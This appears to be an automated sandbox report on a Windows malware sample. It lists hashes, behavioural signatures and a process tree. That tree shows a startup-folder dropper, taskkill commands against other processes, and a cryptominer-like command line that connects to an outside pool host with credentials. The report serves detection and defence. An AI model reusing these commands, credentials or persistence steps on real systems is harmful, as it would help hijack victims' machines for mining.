Analysis

max time kernel: 150s
max time network: 154s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 06/12/2022, 00:16

Static task: static1

Behavioral task: behavioral1
  Sample: a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe
  Resource: win7-20220901-en

Behavioral task: behavioral2
  Sample: a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe
  Resource: win10v2004-20220812-en
General

Target: a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe
Size: 396KB
MD5: 5c8169f5cca362ce7c22b25eda15fbd8
SHA1: 41999d841d4445d7178b2a8625b273c893482403
SHA256: a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32
SHA512: 376e6b0fd4457dfa299db1e83673c56830ae3310d516c9a19d7f42ee4b0c83a640e2b244fc9756d9d6dc9243e9a758de862e10140c6a03d66bd26f8c5520ae3a
SSDEEP: 12288:uutrzh9xOXkF91QHrdGwQMu/yvSqi39mU6lnm:uutr5OUFnQZGn/Q9i39mZlnm
Malware Config
Signatures

- Executes dropped EXE (3 IoCs)
  pid   Process
  4740  stepx2.exe
  3496  hid.exe
  1112  x30811.exe

  resource                                                              yara_rule
  behavioral2/files/0x0006000000022e71-146.dat                          upx
  behavioral2/files/0x0006000000022e71-147.dat                          upx
  behavioral2/memory/1112-148-0x0000000000400000-0x0000000000500000-memory.dmp  upx
  behavioral2/memory/1112-149-0x0000000000400000-0x0000000000500000-memory.dmp  upx

- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                   Process
  Key value queried  \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation  a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation  stepx2.exe

- Drops startup file (3 IoCs)
  description                   ioc                                                                                                              Process
  File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\__tmp_rar_sfx_access_check_240573343  a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe
  File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\stepx2.exe                            a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe
  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\stepx2.exe                            a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe

- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

- Kills process with taskkill (3 IoCs)
  pid   Process
  1352  taskkill.exe
  4936  taskkill.exe
  1640  taskkill.exe

- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description               pid   Process
  Token: SeDebugPrivilege   4936  taskkill.exe
  Token: SeDebugPrivilege   1640  taskkill.exe
  Token: SeDebugPrivilege   1352  taskkill.exe

- Suspicious use of WriteProcessMemory (21 IoCs; each event below is recorded three times in the report)
  description                       pid   Process                                                                  procid_target
  PID 4268 wrote to memory of 4740  4268  a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe  81
  PID 4740 wrote to memory of 3496  4740  stepx2.exe                                                               82
  PID 3496 wrote to memory of 1296  3496  hid.exe                                                                  83
  PID 1296 wrote to memory of 4936  1296  cmd.exe                                                                  86
  PID 1296 wrote to memory of 1640  1296  cmd.exe                                                                  87
  PID 1296 wrote to memory of 1352  1296  cmd.exe                                                                  88
  PID 1296 wrote to memory of 1112  1296  cmd.exe                                                                  89
Processes

C:\Users\Admin\AppData\Local\Temp\a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe (PID 4268, level 1)
  command line: "C:\Users\Admin\AppData\Local\Temp\a48fe92565c137832f13c9745a7e9d46140a8eba5056bf8466f3664a8c27bf32.exe"
  - Checks computer location settings
  - Drops startup file
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\Start Menu\Programs\Startup\stepx2.exe (PID 4740, level 2)
    command line: "C:\Users\Admin\Start Menu\Programs\Startup\stepx2.exe"
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\hid.exe (PID 3496, level 3)
      command line: "C:\Users\Admin\AppData\Local\Temp\hid.exe" /NOCONSOLE yz.bat
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\cmd.exe (PID 1296, level 4)
        command line: C:\Windows\system32\cmd.exe /c yz.bat
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\taskkill.exe (PID 4936, level 5)
          command line: taskkill /f /im svchoost.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\SysWOW64\taskkill.exe (PID 1640, level 5)
          command line: taskkill /f /im mamita.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\SysWOW64\taskkill.exe (PID 1352, level 5)
          command line: taskkill /f /im x11811.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

        C:\Users\Admin\AppData\Local\Temp\x30811.exe (PID 1112, level 5)
          command line: x30811.exe -a 60 -g yes -o http://y.bethyname.info:8332/ -u redem_guild -p redemxxx5x2 -t 2
          - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v6
Downloads
Download 1
  Filesize: 43KB
  MD5: c1c769d742f88e441ded76bf57a5a45c
  SHA1: 06872dabd41e70dc4ef8fd5131b334be8a17db3c
  SHA256: 3e857094c9d89b31676477ce7d8d523f94c767f3cb0769dae99af76b3c4e004b
  SHA512: d35478590ab1abee0293589a8b8cc13307afb0a14d7bd01a35388114ace6cb007e0f132e5d90bc5ae90b3e36a3edef67354a94363415cf2a1d3ef5f4ae99636f

Download 2
  Filesize: 252KB
  MD5: 05b0cc5b7cf23668bff73252aee633f4
  SHA1: 981766824c1ff41a88a9babcf07fdaa6c03cfc64
  SHA256: 0999ac7185282e800e1d255f510dd4f349ce3c5b21a1a9bb5dc85cfd2a3941f1
  SHA512: ca395c530edf615942ad1e2a59e20e4429068dcfee4dc932c89d7200dae58443d9ed4d88a1e1c62dd5b5da9e15389e391011c79e0e05974a9e461134d9c3bc64

Download 3
  Filesize: 177B
  MD5: b8c466d2f66004d05f71a5484105e09c
  SHA1: 0d14cad742e6f2b07d9048b608ad6323986d6564
  SHA256: 54f81b14c36b97c95717665082984427e61fbd52a36e2ff705a0c64e8415d186
  SHA512: 91818f7223e530a732b4da1f2adae588a3dad3a9271cf0cd2a8b2b02a724ed01c6570e69836d274db0210c26428215b8ab1d6d15d3a37b47231c2c9a850607e6

Download 4
  Filesize: 347KB
  MD5: f83b54e2d32ef76e9417dbadd228dacb
  SHA1: ccad473fbec4c815577d3ceca625e3c0c72dbea8
  SHA256: 2e8a59f390997f0e63e2b905c423fee9afe93bc31ca7ca253495a2d6f26591b7
  SHA512: 92bdb15ef0f204bc17f311edfcc52c785bfde99caf0bb60926ff7d8aee94e17979a052ed8b4f8f26565bbbcea4b2d55f10f5913fa67631279683efcb0af8d280